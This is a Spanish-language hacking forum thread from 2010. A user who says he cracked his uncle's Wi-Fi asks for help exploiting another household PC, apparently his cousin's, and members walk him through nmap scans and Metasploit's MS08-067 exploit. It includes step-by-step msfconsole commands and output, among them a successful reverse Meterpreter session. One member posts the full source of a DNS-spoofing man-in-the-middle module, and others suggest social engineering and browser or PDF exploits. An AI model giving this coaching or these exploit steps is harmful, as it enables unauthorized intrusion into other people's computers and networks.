Foro de elhacker.net

Seguridad Informática => Hacking => Mensaje iniciado por: cpu2 en 3 Enero 2010, 18:19 pm



Título: Ayuda Nmap y Metasploit
Publicado por: cpu2 en 3 Enero 2010, 18:19 pm
Hola
Bien este es mi problema, hice una a puesta con mi tio de que le entraria a su ordenador y tener el control del sistema.Yo uso Linux

Lo primero que ice fue petarle el router con aircrack-ng para poder tener conexion a su red y asi poder entrarle, luego me conecto a traves de dhclient vale pos me conecto y dhclient me dice 1 cosa asi

DHCPACK of 192.168.1.34 from 192.168.1.1

yo entiendo esto decirme si me confundo 192.168.1.34 es mi ip y 192.168.1.1 la suya no?

Ok voy a nmap y ago esto

nmap 192.168.1.1/24

me sale esto mas o menos

PORT   STATE SERVICE
20/tcp open  ftp
23/tcp open  ssh
26/tcp open  telnet
83/tcp open  http
MAC Address: 00:2CXXXXXXXX

Ok y abajo otra cosa q es esto

Interesting ports on 192.168.1.32

PORT     STATE SERVICE
6551/tcp open  bittorrent-tracker
MAC Address: 00:16:XXXXXXXX <-------- otra mac creo q es mi primo q baja con el bittorrent y esta conectado ala red por wifi

Vale creo que ya e encontrado por donde entrar por bittorrent.
ok escaneo la ip  192.168.1.32 esta vez ago esto

nmap -O 192.168.1.32

Para saber q sistema usa on q ya lo sepa
Me pone q es windows xp SP2 O SP3

Ok hasta aki me e kedado que EXPLOIT LE TENGO Q LANZAR Y COMO CON METASPLOIT y si e hecho algo mal.

Gracias un saludo


Título: Re: Ayuda Nmap y Metasploit
Publicado por: Masita en 3 Enero 2010, 19:13 pm
Bien lo primero: 192.168.1.1 es la puerta de enlace, para que nos entendamos es la ip del router. Sobre el ataque siendo esa version de windows primero tendrias que probar  a atacar el SMB. El foro esta plagado de post hablando sobre el asi que busca.

Deberias aprender por que funcionan las cosas y no solo como se hacen. Asi que almenos busca el exploit por que lo nombran en infinidad de post. Y no utilices mayusculas indiscriminadamente o te llamaran la atencion.


Título: Re: Ayuda Nmap y Metasploit
Publicado por: AlbertoBSD en 3 Enero 2010, 19:59 pm
Si como te comentaron 192.168.1.1 es la puerta de enlace en este caso "el router".

En ese caso en nmap usa la opcion -A que de da informacion de la version del programa que escucha en esos puertos, apartide de ahi buscas vulnerabiliades en securityfocus

sobre el metasploit habria que ver si este tiene el exploit necesario para alguna vulnerabilidad.

Saludos


Título: Re: Ayuda Nmap y Metasploit
Publicado por: Shell Root en 3 Enero 2010, 19:59 pm
Mira mis POST en las secciones de Hacking Avanzado y Hacking Basico. Tambien podes guiarte con mis videos.

http://www.youtube.com/user/alex19910218

Edit: Te recomiendo que uses el Scanner Nessus.  ;)

Saludos!


Título: Re: Ayuda Nmap y Metasploit
Publicado por: ChElAnO en 7 Enero 2010, 01:34 am
intenta exploits para los bugs mas conocidos de windows como ms08-067.

usa metasploit


Título: Re: Ayuda Nmap y Metasploit
Publicado por: rockernault en 7 Enero 2010, 02:24 am
el exploit es MSF se llama windows/smb/ms08_067_netapi


Título: Re: Ayuda Nmap y Metasploit
Publicado por: cpu2 en 7 Enero 2010, 18:23 pm
Hola

Use el exploit windows/smb/ms08_067_netapi pero cuando cargo el ataque con el commando exploit me dice error os digo los pasos que ago aver que ago mal:

use windows/smb/ms08_067_netapi

show options

set RHOST 192.168.1.32    <----------- es lo que me dio nmap de la vulnerabilidad de bittorrent

set PAYLOAD windows/shell/bind_tcp

show options

exploit         

y me dice esto
  • Started bind handler
  • [-] Exploit failed: The host (192.168.1.32:445) was unreachable.
  • Exploit completed, but no session was created.
no funciona donde esta el error.
Un saludo


Título: Re: Ayuda Nmap y Metasploit
Publicado por: Masita en 7 Enero 2010, 18:31 pm
No soy un experto en metasploit pero creo que se cual es el fallo. El RHOST si no me equivoco es una funcion del payload asi que primera indica cual es el payload y despues ya indicas el RHOST.


Título: Re: Ayuda Nmap y Metasploit
Publicado por: Shell Root en 7 Enero 2010, 18:36 pm
No soy un experto en metasploit pero creo que se cual es el fallo. El RHOST si no me equivoco es una funcion del payload asi que primera indica cual es el payload y despues ya indicas el RHOST.
No el RHOST es el HostRemoto, se indica al momento de escoger el PAYLOAD y/o exploit. El PAYLOAD es la accion a realizarse si se ejecuta el Exploit Correctamente.


cpu2 Mira.
qqUkCz5BrD8   |   oZ7BsWXiVuE

Saludos!


Título: Re: Ayuda Nmap y Metasploit
Publicado por: rockernault en 7 Enero 2010, 18:37 pm
Citar
No soy un experto en metasploit pero creo que se cual es el fallo. El RHOST si no me equivoco es una funcion del payload asi que primera indica cual es el payload y despues ya indicas el RHOST.


NOOOOOOOO...

Citar
-] Exploit failed: The host (192.168.1.32:445) was unreachable.

en otras palabras, no tiene el puerto abierto..

intentas explotar una vulnerabilidad de samba en un puerto mal configurado de bittotrrent??


Título: Re: Ayuda Nmap y Metasploit
Publicado por: Shell Root en 7 Enero 2010, 18:39 pm
Pwned, como bien lo dijistes

PORT     STATE SERVICE
6551/tcp open  bittorrent-tracker

Como ves esta abierto el puerto 6551/tcp y el con el exploit windows/smb/ms08_067_netapi debe de estar abierto el puerto 445

Verificalo en el RPORT


Título: Re: Ayuda Nmap y Metasploit
Publicado por: Masita en 7 Enero 2010, 18:42 pm
No soy un experto en metasploit pero creo que se cual es el fallo. El RHOST si no me equivoco es una funcion del payload asi que primera indica cual es el payload y despues ya indicas el RHOST.
No el RHOST es el HostRemoto, se indica al momento de escoger el PAYLOAD y/o exploit. El PAYLOAD es la accion a realizarse si se ejecuta el Exploit Correctamente.

Se que el payload es la accion y el rhost el host remoto si lo sabia, pero creia que tenias que declararlos uno despues del otro. Ya que dependiendo del payload tienes unas "options" u otras. Ademas no me habia fijado en el error en concreto mea culpa.  :silbar:


Título: Re: Ayuda Nmap y Metasploit
Publicado por: rockernault en 7 Enero 2010, 18:45 pm
cpu2 YOU'VE BEEN PWNED
(http://cdn0.knowyourmeme.com/i/7346/original/pwned4.jpg)


Título: Re: Ayuda Nmap y Metasploit
Publicado por: cpu2 en 7 Enero 2010, 19:17 pm
Gracais a todos por ayudarme y contestar tan rapido

Shell Root
Nada e visto los 2 videos los e probado y nada me dice lo mismo en el segunbdo video que haces un payload windows/shell/reverse_tcp, cuando metes el RHOST 192.168.0.3 es tu ip? por que yo puse la mia y nada no funciona alguna idea?

rokernault

Como le exploto una vulnerabilidad de samba en un puerto de bittorrent a eso de samba me suena a algo de linux aa vaya imagen as puesto tio jeje.

Un saludo


Título: Re: Ayuda Nmap y Metasploit
Publicado por: Shell Root en 7 Enero 2010, 19:25 pm
cpu2, a ver,

1. RHOST= Host_Remoto; LHOST= Host_Local
    RPORT= Puerto_Remoto; LPORT= Puerto_Local

2. El exploit que estas usando windows/smb/ms08_067_netapi no funciona en ese sistema, porque?
PORT     STATE SERVICE
6551/tcp open  bittorrent-tracker

Como ves esta abierto el puerto 6551/tcp y el con el exploit windows/smb/ms08_067_netapi debe de estar abierto el puerto 445. Verificalo en el RPORT con el comando Show Options, aunque se puede cambiar el puerto, pero pfff nose...

Saludos!


Título: Re: Ayuda Nmap y Metasploit
Publicado por: rockernault en 7 Enero 2010, 19:49 pm
samba

la he cagao..

http://en.wikipedia.org/wiki/Server_Message_Block


saludos


Título: Re: Ayuda Nmap y Metasploit
Publicado por: cpu2 en 7 Enero 2010, 20:00 pm
Shell Root mira es lo que me sale ami

use exploit/windows/smb/ms08_067_netapi   <------------- ningun problema

show options

Module options:
 Name     Current Setting  Required  Description
 ---------   ------------------  ------------  -------------
RHOST                                  yes         The target address
RPORT   445                         yes         Set the SMB service port
SMBPIPE  BROWSER           yes         The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id  Name
--  ----
 0   Automatic Targeting

Vale me sale eso por lo que e visto en el video todo igual

set RHOST 192.168.1.32

set payload windows/shell/bind_tcp

show options

Module options:
Name     Current Setting  Required  Description
---------   ------------------  ------------  -------------
RHOST   192.168.132      yes            The target address
RPORT   445                    yes            Set the SMB service port
SMBPIPE  BROWSER     yes             The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/shell/bind_tcp):
Name     Current Setting  Required  Description
---------   ------------------  ------------  -------------
EXITFUNC   thread            yes          Exit technique: seh, thread, process
LPORT         4444               yes          The local port
LHOST      192.168.1.32     no           The target address

Exploit target:
Id  Name
--  ----
 0   Automatic Targeting

eso sale

exploit

    *  Started bind handler
      [-] Exploit failed: The host (192.168.1.32:445) was unreachable.
    * Exploit completed, but no session was created.

eso es mi caso alguna idea creo que lo ago bien?
Un saludo



Título: Re: Ayuda Nmap y Metasploit
Publicado por: Shell Root en 7 Enero 2010, 20:07 pm
1. Ingresando RHOST y LHOST iguales, WTF!
    No tiene problema, pero jajaja es raro, prefiero crearme tan siquiera una Maquina Virtual. :·P
2. Importante: La maquina a la que deseas ingresar con el exploit, no es vulnerable a ese exploit... xD

2. El exploit que estas usando windows/smb/ms08_067_netapi no funciona en ese sistema, porque?
PORT     STATE SERVICE
6551/tcp open  bittorrent-tracker

Como ves esta abierto el puerto 6551/tcp y el con el exploit windows/smb/ms08_067_netapi debe de estar abierto el puerto 445. Verificalo en el RPORT con el comando Show Options, aunque se puede cambiar el puerto, pero pfff nose...

Saludos!

Saludos!


Título: Re: Ayuda Nmap y Metasploit
Publicado por: rockernault en 7 Enero 2010, 20:16 pm
Citar
Module options:
Name     Current Setting  Required  Description
---------   ------------------  ------------  -------------
RHOST   192.168.132      yes            The target address
RPORT   445                    yes            Set the SMB service port
SMBPIPE  BROWSER     yes             The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/shell/bind_tcp):
Name     Current Setting  Required  Description
---------   ------------------  ------------  -------------
EXITFUNC   thread            yes          Exit technique: seh, thread, process
LPORT         4444               yes          The local port
LHOST      192.168.1.32     no           The target address

mira bien las ip..

da igual, la maquina no es vulnerable


Título: Re: Ayuda Nmap y Metasploit
Publicado por: Shell Root en 7 Enero 2010, 20:42 pm
mira bien las ip..

No tiene nada que ver, mira.

Citar
Código:
               |                    |      _) |  
 __ `__ \   _ \ __|  _` |  __| __ \  |  _ \  | __|
 |   |   |  __/ |   (   |\__ \ |   | | (   | | |  
_|  _|  _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
                              _|                  


       =[ metasploit v3.3.2-release [core:3.3 api:1.0]
+ -- --=[ 462 exploits - 219 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
       =[ svn r7808 updated 28 days hago (2009.12.10)


msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.2
RHOST => 192.168.0.2
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.2
LHOST => 192.168.0.2
msf exploit(ms08_067_netapi) > exploit

  • Started reverse handler on port 4444
  • Automatically detecting the target...
  • Fingerprint: Windows XP Service Pack 2 - lang:Spanish
  • Selected Target: Windows XP SP2 Spanish (NX)
  • Triggering the vulnerability...
  • Sending stage (723456 bytes)
  • Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.2:9121)[/b]

    meterpreter >
Saludos!


Título: Re: Ayuda Nmap y Metasploit
Publicado por: cpu2 en 7 Enero 2010, 20:44 pm
Como es posible si NMAP me dice que es vulnerable a eso -.-
¿alguna idea? jaja

buena rockernalult me a pasao lo mismo que en la imagen jeje

Shell Root gracias tio pero al final no e podido mi tio gano, otra vez sera gracias a todos por ayudarme.

Un saludo


Título: Re: Ayuda Nmap y Metasploit
Publicado por: Shell Root en 7 Enero 2010, 20:49 pm
Como es posible si NMAP me dice que es vulnerable a eso -.-

A ver Nmap te lanzo el puerto 6551/tcp bittorrent-tracker, No?
Ok, dentro de los parametros de ejecucion del Exploit windows/smb/ms08_067_netapi, necesitas que esta abierto el puerto 445. Alguna duda, es simple... xD

Shell Root gracias tio pero al final no e podido mi tio gano, otra vez sera gracias a todos por ayudarme.
No te rindas... ;) . Nada es Imposible...

Saludos!


Título: Re: Ayuda Nmap y Metasploit
Publicado por: rockernault en 7 Enero 2010, 20:58 pm
Citar
No tiene nada que ver, mira.

es cierto...  :laugh:


Título: Re: Ayuda Nmap y Metasploit
Publicado por: neuronass en 22 Febrero 2010, 03:36 am
haber si alguien me ayuda...

escaneo:
Citar
Starting Nmap 5.00 ( http://nmap.org ) at 2010-02-21 23:21 ART
Interesting ports on 192.168.1.100:                           
Not shown: 996 filtered ports                                 
PORT     STATE  SERVICE
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds
1025/tcp open   NFS-or-IIS
2869/tcp closed unknown

Nmap done: 1 IP address (1 host up) scanned in 4.59 seconds

haber si allguein me pude ayudar..
Citar
____________                                                                                                                                                   
< metasploit >                                                                                                                                                   
 ------------                                                                                                                                                   
       \   ,__,                                                                                                                                                 
        \  (oo)____                                                                                                                                             
           (__)    )\                                                                                                                                           
              ||--|| *                                                                                                                                           
                                                                                                                                                                 

       =[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 524 exploits - 246 auxiliary           
+ -- --=[ 193 payloads - 23 encoders - 8 nops     
       =[ svn r8578 updated today (2010.02.21)   

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.100
RHOST => 192.168.1.100                               
msf exploit(ms08_067_netapi) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp                               
msf exploit(ms08_067_netapi) > show options                         

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.100    yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LHOST                      yes       The local address                   
   LPORT     4444             yes       The local port                     


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(ms08_067_netapi) > set LHOST 192.168.1.102
LHOST => 192.168.1.102                               
msf exploit(ms08_067_netapi) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.100    yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LHOST     192.168.1.102    yes       The local address                   
   LPORT     4444             yes       The local port                     


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(ms08_067_netapi) > exploit

  • Started reverse handler on 192.168.1.102:4444
  • Automatically detecting the target...
  • Fingerprint: Windows XP Service Pack 3 - lang:Spanish
  • Selected Target: Windows XP SP3 Spanish (NX)
  • Triggering the vulnerability...
  • Exploit completed, but no session was created.


Título: Re: Ayuda Nmap y Metasploit
Publicado por: togueter en 23 Febrero 2010, 15:43 pm
A ver cpu2, por lo que se ve el ordenador de tu tio es vulnerable, busca por ahí si el bittorrent tiene alguna vulnerabilidad. Que esté el puerto de bittorrent abierto no quiere decir que puedas entrar por ahí. Seguramente tb tendrá parcheado el fallo de ms08_067netapi, por eso no te pirula el exploit; así que no hay na que rascar. Buscate otro metodo.


Título: Re: Ayuda Nmap y Metasploit
Publicado por: Shell Root en 23 Febrero 2010, 18:55 pm
Que tal neuronass, veo que esta OPEN el microsoft-ds, pero para estár aun más seguros, intentad escanearlo con el Nessus!



togueter, WTF!


Título: Re: Ayuda Nmap y Metasploit
Publicado por: rockernault en 23 Febrero 2010, 22:03 pm
Citar
togueter, WTF!

eso de plano es no saber..... +1


Título: Re: Ayuda Nmap y Metasploit
Publicado por: tragantras en 24 Febrero 2010, 13:34 pm
yo creo que el problema es que veis todo bajo el mismo punto de vista:

-Escaneo host en busca de puertos abiertos / servicios vulnerables
-Metasploit hace el resto por mi...

Qué pasa? que cuando queda parcheado un fallo TYPICAL pues se acaba el juego... hay mil cosas que pueds hacer, para empezar si un host está descargando desde el bittorrent, quizá sea vulnerable a ataques MitM que te permitan modificar los paquetes ( aunque este tipo de técnicas suelen ser complicadas ), prueba con ingeniería social... algun tipo de java applet infection ( hay varios posts en este foro sobre ello ), prueba con las 3333 vulnerabilidades que han salido recientemente en productos Adobe ( acrobat reader ) o con las de iexplore ( aurora ) o con las de Firefox... hay muchos caminos y restringirse tan solo al metasploit es lo peor que pueds hacer.

un saludo!


Título: Re: Ayuda Nmap y Metasploit
Publicado por: togueter en 24 Febrero 2010, 19:03 pm
...por eso he puesto "buscate otro metodo" refiriendome a que busque otra forma q no sea usar ese exploit.
si me he equivocado lo siento, no hace falta ser groseros, llevo poco tiempo en esto.


Título: Re: Ayuda Nmap y Metasploit
Publicado por: rockernault en 24 Febrero 2010, 21:08 pm
Citar
si un host está descargando desde el bittorrent, quizá sea vulnerable a ataques MitM que te permitan modificar los paquetes ( aunque este tipo de técnicas suelen ser complicadas

que opinas Shell Root??



Título: Re: Ayuda Nmap y Metasploit
Publicado por: Shell Root en 24 Febrero 2010, 21:22 pm
que opinas Shell Root??
:silbar:



Bueno, xD, ando de nuevo retirado, ocupaciones como "Desarrollador de Software", quitan demasiado tiempo. Así, solo diré...

"Una vulnerabilidad es tan limitada como tu quieras que sea"

y... [Ettercap] And [Metasploit], hacen una gran pareja! :D


Título: Re: Ayuda Nmap y Metasploit
Publicado por: rockernault en 24 Febrero 2010, 21:26 pm
me referia a que es una tonteria...  MiTM no es una vulnerabilidad...

podrias modificar los paquetes.. pero con que objeto???


Título: Re: Ayuda Nmap y Metasploit
Publicado por: Shell Root en 24 Febrero 2010, 22:01 pm
me referia a que es una tonteria...  MiTM no es una vulnerabilidad...
Es verdad... tan solo es un ataque en el que el enemigo adquiere la capacidad de leer, insertar y modificar a voluntad, los mensajes entre dos partes sin que ninguna de ellas conozca que el enlace entre ellos ha sido violado...

Tal vez si los paquetes fuesen "Archivos", se modificarian por algun PAYLOAD



PD: fakedns.rb, responde a cualquier consulta DNS con una respuesta falsa apuntando a una dirección IP específica.
Código
  1. ##
  2. # $Id: fakedns.rb 5540 2008-06-25 23:04:19Z hdm $
  3. ##
  4.  
  5. ##
  6. # This file is part of the Metasploit Framework and may be subject to
  7. # redistribution and commercial restrictions. Please see the Metasploit
  8. # Framework web site for more information on licensing and terms of use.
  9. # http://metasploit.com/projects/Framework/
  10. ##
  11.  
  12.  
  13. require 'msf/core'
  14. require 'resolv'
  15.  
  16. module Msf
  17.  
  18. class Auxiliary::Server::MITM_FakeDNS < Msf::Auxiliary
  19.  
  20. include Auxiliary::Report
  21.  
  22. def initialize
  23. super(
  24. 'Name'        => 'MITM DNS Service',
  25. 'Version'     => '$Revision: 5540 $',
  26. 'Description'    => %q{
  27.  This hack of the metasploit fakedns.rb serves as a sort
  28.  of MITM DNS server.  Requests are passed through to a real
  29.  DNS server, and the responses are modified before being
  30.  returned to the client, if they match regular expressions
  31.  set in FILENAME.
  32. },
  33. 'Author'      => ['ddz', 'hdm', 'Wesley McGrew <wesley@mcgrewsecurity.com>'],
  34. 'License'     => MSF_LICENSE,
  35. 'Actions'     =>
  36. [
  37. [ 'Service' ]
  38. ],
  39. 'PassiveActions' =>
  40. [
  41. 'Service'
  42. ],
  43. 'DefaultAction'  => 'Service'
  44. )
  45.  
  46. register_options(
  47. [
  48. OptAddress.new('SRVHOST',   [ true, "The local host to listen on.", '0.0.0.0' ]),
  49. OptPort.new('SRVPORT',      [ true, "The local port to listen on.", 53 ]),
  50. # W: Added in an option for a set of filters, took out the catchall TARGETHOST
  51. OptAddress.new('REALDNS', [true,"Ask this server for answers",nil]),
  52. OptString.new('FILENAME', [true,"File of ip,regex for filtering responses",nil])
  53. ], self.class)
  54. end
  55.  
  56.  
  57. def run
  58.  
  59. begin
  60.  fp = File.new(datastore['FILENAME'])
  61. rescue
  62.  print_status "Could not open #{datastore['FILENAME']} for reading.  Quitting."
  63.    return
  64. end
  65. mod_entries = []
  66. while !fp.eof?
  67.    entry = fp.gets().chomp().split(',')
  68.    mod_entries.push([entry[0],Regexp.new(entry[1])])
  69.  end
  70.  
  71.  
  72. @port = datastore['SRVPORT'].to_i
  73.  
  74.    # MacOS X workaround
  75.    ::Socket.do_not_reverse_lookup = true
  76.  
  77.    @sock = ::UDPSocket.new()
  78.    @sock.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_REUSEADDR, 1)
  79.    @sock.bind(datastore['SRVHOST'], @port)
  80.    @run = true
  81.  
  82. Thread.new {
  83. # Wrap in exception handler
  84.  begin
  85.  
  86.        while @run
  87.          packet, addr = @sock.recvfrom(65535)
  88.          if (packet.length == 0)
  89.              break
  90.          end
  91.  
  92.          request = Resolv::DNS::Message.decode(packet)
  93.  
  94.  
  95.          # W: Go ahead and send it to the real DNS server and
  96.          #    get the response
  97.          sock2 = ::UDPSocket.new()
  98.          sock2.send(packet, 0, datastore['REALDNS'], 53) #datastore['REALDNS'], 53)
  99.          packet2, addr2 = sock2.recvfrom(65535)
  100.          sock2.close()
  101.  
  102.  
  103.          real_response = Resolv::DNS::Message.decode(packet2)
  104.          fake_response = Resolv::DNS::Message.new()
  105.  
  106.          fake_response.qr = 1 # Recursion desired
  107.          fake_response.ra = 1 # Recursion available
  108.          fake_response.id = real_response.id
  109.  
  110.          real_response.each_question { |name, typeclass|
  111.            fake_response.add_question(name, typeclass)
  112.          }
  113.  
  114.          real_response.each_answer { |name, ttl, data|
  115.            replaced = false
  116.            mod_entries.each { |e|
  117.              if name.to_s =~ e[1]
  118.                case data.to_s
  119.                when /IN::A/
  120.                  data = Resolv::DNS::Resource::IN::A.new(e[0])
  121.                  replaced = true
  122.                when /IN::MX/
  123.                  data = Resolv::DNS::Resource::IN::MX.new(10,Resolv::DNS::Name.create(e[0]))
  124.                  replaced = true
  125.                when /IN::NS/
  126.                  data = Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(e[0]))
  127.                  replaced = true
  128.                when /IN::PTR/
  129.                  # Do nothing
  130.                  replaced = true
  131.                else
  132.                  # Do nothing
  133.                  replaced = true
  134.                end
  135.              end
  136.              break if replaced
  137.            }
  138.            fake_response.add_answer(name,ttl,data)
  139.          }
  140.  
  141.          real_response.each_authority { |name, ttl, data|
  142.            mod_entries.each { |e|
  143.              if name.to_s =~ e[1]
  144.                data = Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(e[0]))
  145.                break
  146.              end
  147.            }
  148.            fake_response.add_authority(name,ttl,data)
  149.          }
  150.  
  151.          response_packet = fake_response.encode()
  152.  
  153.          @sock.send(response_packet, 0, addr[3], addr[1])
  154.        end
  155.  
  156. # Make sure the socket gets closed on exit
  157.  rescue ::Exception => e
  158.  print_error("fakedns: #{e.class} #{e} #{e.backtrace}")
  159.  ensure
  160.  @sock.close
  161.  end
  162.  
  163. }
  164.  
  165. end
  166.  
  167. end
  168. end


Título: Re: Ayuda Nmap y Metasploit
Publicado por: tragantras en 26 Febrero 2010, 01:11 am
me referia a que es una tonteria...  MiTM no es una vulnerabilidad...

podrias modificar los paquetes.. pero con que objeto???


jajaja, cierto cierto.... qué tontería esto de poder modificar los archivos que te bajes eh... mira que si alguien coge y te cambia tu  crack.exe por virusaco.exe aisss que tonterías... xD

Un MiTM yo lo considero que es una vulnerabilidad, es una vulnerabilidad de ciertas configuraciones de las tablas cache ARP. Hace 1 año o asi unos investigadores consiguieron hacer un MiTM a una camara de vigilancia IP, pudiendo insertar el video que quisiesen, eso tambien lo ves una tonteria? jaja

si es capaz, de modificar los paquetes que un usuario se descarga tiene medio trabajo hecho...


Título: Re: Ayuda Nmap y Metasploit
Publicado por: rockernault en 26 Febrero 2010, 01:47 am
que es eso de "ciertas configuraciones" ???

el protocolo es el ARP... protocolo de resolucion de direcciones que se encarga de asociar MAC/IP

no hay nada que configurar en el mismo protocolo... salvo que sean estaticas o dinamicas..

y NO es una vulnerabilidad.... digamos que es un mal uso del protocolo...

modificar paquetes???  hablamos de vulnerabilidades de un sistema... ya sea de SO o de programas (Excel, Adobe, etc)

el DNS spoofin' y esas cosas.. son malos usos de los protocolos y tu no puedes impedirlos... a excepcion de que sepas como defenderte de esos ataques en concreto...
 
y respecto a MSF...  si te sirve, bien si no... tambn...


Título: Re: Ayuda Nmap y Metasploit
Publicado por: tragantras en 27 Febrero 2010, 12:41 pm
que es eso de "ciertas configuraciones" ???

el protocolo es el ARP... protocolo de resolucion de direcciones que se encarga de asociar MAC/IP

no hay nada que configurar en el mismo protocolo... salvo que sean estaticas o dinamicas..

y NO es una vulnerabilidad.... digamos que es un mal uso del protocolo...

modificar paquetes???  hablamos de vulnerabilidades de un sistema... ya sea de SO o de programas (Excel, Adobe, etc)

el DNS spoofin' y esas cosas.. son malos usos de los protocolos y tu no puedes impedirlos... a excepcion de que sepas como defenderte de esos ataques en concreto...
 
y respecto a MSF...  si te sirve, bien si no... tambn...


con ciertas configuraciones me refería exactamente a lo que tu has mencionado, se pueden configurar las tablas de manera estática evitando el ARP poisoning o de manera dinámica siendo vulnerable ( aun que no quieras aceptar ese término ).

modificar paquetes es una solucion perfectamente válida, quizá dificil de implementar, pero válida es xD


Título: Re: Ayuda Nmap y Metasploit
Publicado por: rockernault en 27 Febrero 2010, 14:39 pm
y venga... que modificarias en los paquetes???

nada de que es dificil.. si lo mencionaste es porque sabes hacerlo....